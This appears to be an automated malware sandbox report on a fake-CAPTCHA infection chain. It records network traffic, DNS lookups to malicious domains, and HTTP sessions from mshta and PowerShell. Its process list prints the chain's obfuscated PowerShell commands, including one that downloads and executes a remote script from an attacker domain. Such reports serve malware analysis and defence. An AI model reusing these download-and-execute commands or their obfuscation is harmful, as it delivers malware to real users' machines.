Jan 1, 2025 05:36:02.788110018 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788137913 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788168907 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788172960 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788202047 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788222075 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788420916 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788435936 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788487911 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788491964 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788527966 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788630962 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788645029 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788716078 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788716078 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788719893 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788764954 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788916111 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788929939 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788957119 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.788961887 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.788986921 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.789017916 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880361080 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880382061 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880445004 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880449057 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880459070 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880476952 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880500078 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880503893 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880525112 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880542994 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880565882 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880614042 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880616903 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880625010 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880656958 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880670071 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880672932 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880700111 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880709887 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880712986 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880722046 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880744934 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880768061 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880772114 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.880796909 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.880812883 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.881321907 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.881335020 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.881407022 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.881412029 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.881448030 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.881858110 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.881870985 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.881920099 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.881925106 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.881958961 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.881979942 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.882201910 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882231951 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882242918 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882266998 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882270098 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.882275105 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882296085 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.882368088 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882371902 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.882375956 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882414103 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.882417917 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882432938 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.882455111 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.882493019 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.882792950 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.882807016 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:11.083738089 CET  49737        443        192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:11.083779097 CET  443          49737      188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:11.083847046 CET  49737        443        192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:11.093849897 CET  49737        443        192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:11.093863010 CET  443          49737      188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:11.562410116 CET  443          49737      188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:11.562483072 CET  49737        443        192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:11.564594030 CET  49737        443        192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:11.564608097 CET  443          49737      188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:11.564798117 CET  443          49737      188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:11.577732086 CET  49737        443        192.168.2.4    188.114.97.3
Jan 1, 2025 05:36:11.623341084 CET  443          49737      188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:50.636832952 CET  443          49737      188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:50.636893034 CET  443          49737      188.114.97.3   192.168.2.4
Jan 1, 2025 05:36:50.636989117 CET  49737        443        192.168.2.4    188.114.97.3
                                                      Jan 1, 2025 05:36:50.643488884 CET49737443192.168.2.4188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 05:35:59.437186003 CET | 63454 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 05:35:59.449059963 CET | 53 | 63454 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 05:36:00.795576096 CET | 57837 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 05:36:00.807666063 CET | 53 | 57837 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 05:36:11.068502903 CET | 56408 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 05:36:11.079205036 CET | 53 | 56408 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 1, 2025 05:35:59.437186003 CET | 192.168.2.4 | 1.1.1.1 | 0x3c4b | Standard query (0) | solve.vwglq.com | A (IP address) | IN (0x0001) | false
Jan 1, 2025 05:36:00.795576096 CET | 192.168.2.4 | 1.1.1.1 | 0x9bef | Standard query (0) | deduhko2.kliphuwatey.shop | A (IP address) | IN (0x0001) | false
Jan 1, 2025 05:36:11.068502903 CET | 192.168.2.4 | 1.1.1.1 | 0x9327 | Standard query (0) | deduhko.klipzyroloo.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 1, 2025 05:35:59.449059963 CET | 1.1.1.1 | 192.168.2.4 | 0x3c4b | No error (0) | solve.vwglq.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 05:35:59.449059963 CET | 1.1.1.1 | 192.168.2.4 | 0x3c4b | No error (0) | solve.vwglq.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 05:36:00.807666063 CET | 1.1.1.1 | 192.168.2.4 | 0x9bef | No error (0) | deduhko2.kliphuwatey.shop | | 172.67.144.62 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 05:36:00.807666063 CET | 1.1.1.1 | 192.168.2.4 | 0x9bef | No error (0) | deduhko2.kliphuwatey.shop | | 104.21.28.48 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 05:36:11.079205036 CET | 1.1.1.1 | 192.168.2.4 | 0x9327 | No error (0) | deduhko.klipzyroloo.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 05:36:11.079205036 CET | 1.1.1.1 | 192.168.2.4 | 0x9327 | No error (0) | deduhko.klipzyroloo.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false

Contacted domains:
• solve.vwglq.com
• deduhko2.kliphuwatey.shop
• deduhko.klipzyroloo.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | 7584 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-01 04:36:00 UTC | 371 | OUT | GET /awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d HTTP/1.1
Accept: */*
Accept-Language: en-CH
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: solve.vwglq.com
Connection: Keep-Alive
2025-01-01 04:36:00 UTC | 851 | IN | HTTP/1.1 302 Found
Date: Wed, 01 Jan 2025 04:36:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Location: https://deduhko2.kliphuwatey.shop/Poket.mp4
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2Bm9b8N%2BOoiNQtXITTdxiXUue1y6ry3c%2BSFDmVAQ%2FRYIT7juA6ncafKms5I5pTAttrFewSjpdHRYiLnFTnYw7d%2FOiJnTTwwZwP3E74THqN44GhhJ43ejXF%2BDSqZZF3dQTmE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fafce4dba156a53-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1514&rtt_var=590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=953&delivery_rate=1821584&cwnd=222&unsent_bytes=0&cid=6a004c9b6a863e7f&ts=647&x=0"
2025-01-01 04:36:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 172.67.144.62 | 443 | 7584 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-01 04:36:01 UTC | 338 | OUT | GET /Poket.mp4 HTTP/1.1
Accept: */*
Accept-Language: en-CH
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Connection: Keep-Alive
Host: deduhko2.kliphuwatey.shop
2025-01-01 04:36:01 UTC | 918 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 04:36:01 GMT
Content-Type: video/mp4
Content-Length: 1645681
Connection: close
Accept-Ranges: bytes
ETag: "9fb3db7b334f385701b3c88d63b7e5ee"
Last-Modified: Sun, 29 Dec 2024 20:29:14 GMT
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8UH%2BJEsxkb%2BKQYeqDnVqdcQyNppQRHpcNEB0YZXaakWClFV1jzx46tNZXJVwE0%2FOGnYvQlPp4ec9JJgaG3%2BIkE4AuXAWqTfREyxaP0ZTPF2uZRNVqftsPlpF%2BtLWi5CBEV%2FDc8ZtGlKpjm3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fafce54881f7c7e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1872&min_rtt=1867&rtt_var=711&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2873&recv_bytes=920&delivery_rate=1528795&cwnd=228&unsent_bytes=0&cid=7f8b91026d8f1fc4&ts=295&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | 8128 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-01 04:36:11 UTC | 83 | OUT | GET /mazkk.eml HTTP/1.1
Host: deduhko.klipzyroloo.shop
Connection: Keep-Alive
2025-01-01 04:36:50 UTC | 597 | IN | HTTP/1.1 522
Date: Wed, 01 Jan 2025 04:36:50 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 15
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 8fafce94dd61c33c-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1640&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=697&delivery_rate=1761158&cwnd=148&unsent_bytes=0&cid=1795b2b9133f6809&ts=39083&x=0"
2025-01-01 04:36:50 UTC | 15 | IN | Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
Data Ascii: error code: 522


Target ID: 0
Start time: 23:35:56
Start date: 31/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 23:35:56
Start date: 31/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 23:35:57
Start date: 31/12/2024
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d
Imagebase: 0x7ff61ba10000
File size: 14'848 bytes
MD5 hash: 0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 3
Start time: 23:36:00
Start date: 31/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff6eef20000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 23:36:02
Start date: 31/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn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oNU=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((FRsZn('444C5A775845534878786D7A6C446679')),[byte[]]::new(16)).TransformFinalBlock($VUQBu,0,$VUQBu.Length)); & $IoNU.Substring(0,3) $IoNU.Substring(129)
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 23:36:02
Start date: 31/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                      Target ID:6
                                                      Start time:23:36:08
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
                                                      Imagebase:0x890000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:23:36:08
                                                      Start date:31/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1669775097.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                        • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                        • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                        • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874183554.000001F822D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F822D31000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f822d30000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 190f18dc65f2d600bdeb0b2306d9b276d223726b990763eb21240695463127c9
                                                        • Instruction ID: c99566aded798a3b03a8c1e28addeac629123257398749c2ff0670300720a659
                                                        • Opcode Fuzzy Hash: 190f18dc65f2d600bdeb0b2306d9b276d223726b990763eb21240695463127c9
                                                        • Instruction Fuzzy Hash: 6311C63160DBCA0FF79A567884293B836E0DB42351F5900FBD446CB1F2ED289C95C722
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874183554.000001F822D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F822D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f822d30000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 190f18dc65f2d600bdeb0b2306d9b276d223726b990763eb21240695463127c9
                                                        • Instruction ID: c99566aded798a3b03a8c1e28addeac629123257398749c2ff0670300720a659
                                                        • Opcode Fuzzy Hash: 190f18dc65f2d600bdeb0b2306d9b276d223726b990763eb21240695463127c9
                                                        • Instruction Fuzzy Hash: 6311C63160DBCA0FF79A567884293B836E0DB42351F5900FBD446CB1F2ED289C95C722
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000003.1874221914.000001F8209C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F8209C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_3_1f8209c0000_mshta.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction ID: 341e0a4ee47ab9c4710922e5c682c9956b5a94ba92e02077ccb447f935ca65b3
                                                        • Opcode Fuzzy Hash: c84d4f47a0a1eb2755daa284573bcb9c99147f48edbeb189dee0e328c4e70d51
                                                        • Instruction Fuzzy Hash: CF90022489550755E52415910C493AC504163CC250FD44494481B90144D85D12D75153
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 7^$x6^$x6^
                                                        • API String ID: 0-3779041855
                                                        • Opcode ID: a344cbb0169b22d4ca4d773de9f63651de8623219f56709b6bd38f4672320bec
                                                        • Instruction ID: 6838df4581ff179819855462d0545f37e72d78e318c6f24d4798a28ca0f8caed
                                                        • Opcode Fuzzy Hash: a344cbb0169b22d4ca4d773de9f63651de8623219f56709b6bd38f4672320bec
                                                        • Instruction Fuzzy Hash: 56725472B0E6CA4FE7AADB6888655647FE1EF56304F1900FED04DCB1E3D929A846C341
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47af096a7beb4c4594bae026a9d815c61aca19ae69dbcf4eaedbadeb66f93ab4
                                                        • Instruction ID: e24217e151608a85ae76425e9b0af7c3508357e373595418e812985e040b2bbf
                                                        • Opcode Fuzzy Hash: 47af096a7beb4c4594bae026a9d815c61aca19ae69dbcf4eaedbadeb66f93ab4
                                                        • Instruction Fuzzy Hash: 4EF1A331A19A8D8FEBA8DF28C855BE937D1FF54314F04427EE84DC7295DB3899418B82
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd08d29df514cd476d285cef56b8dd4f4c2510118d60a33c51d7236993a60ca5
                                                        • Instruction ID: be375bbf2b2afa3f3ae61d7f7264e60a0d76c1049901e4e115cbecf6b70ce594
                                                        • Opcode Fuzzy Hash: bd08d29df514cd476d285cef56b8dd4f4c2510118d60a33c51d7236993a60ca5
                                                        • Instruction Fuzzy Hash: 3AE1E731A09A8D8FEBA8DF28D8657E977E1FF54310F04426ED84DC7295DF34A9818781
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1192a48acc291c6117b98b8355a7d3aa8a977d789550e2066438de6aa70241ca
                                                        • Instruction ID: 5faae8b19eef7edb44be65755094821a36ad07d902cac907e466dc75a81f3801
                                                        • Opcode Fuzzy Hash: 1192a48acc291c6117b98b8355a7d3aa8a977d789550e2066438de6aa70241ca
                                                        • Instruction Fuzzy Hash: 6F223572B0EA894FE7A5DBA888655687BE1FF56314B1900BED05DC71E3DE29AC42C301
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b1f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb6f1e04046fe2b0197a7a4498ebcc4c1f644c1195ea6ecc8929b96c80b6f829
                                                        • Instruction ID: ba189e09446a68f4e326395e3b0c2b82f56893fbebe208e6b6b3cf4ed44f47cb
                                                        • Opcode Fuzzy Hash: fb6f1e04046fe2b0197a7a4498ebcc4c1f644c1195ea6ecc8929b96c80b6f829
                                                        • Instruction Fuzzy Hash: B3D11463B0FA8E0FEB66ABE848754B57F90EF56354B4900FAE45CC70E3D919A905C381
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869212825.00007FFD9B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ffd9b120000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00146838c8306145332720e46fe84e8cd0a49047d8011d8eac4b926943b4719b
                                                        • Instruction ID: cfef3c5a2e4901eaf3c99c621cca9914f89e9af5e25aea021b756e9494ac748b
                                                        • Opcode Fuzzy Hash: 00146838c8306145332720e46fe84e8cd0a49047d8011d8eac4b926943b4719b
                                                        • Instruction Fuzzy Hash: E8D12572A1DA8D4FEB68DF28C8657E93BE0FF55314F04427AD84DC7292DE34A9428781
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1869842046.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
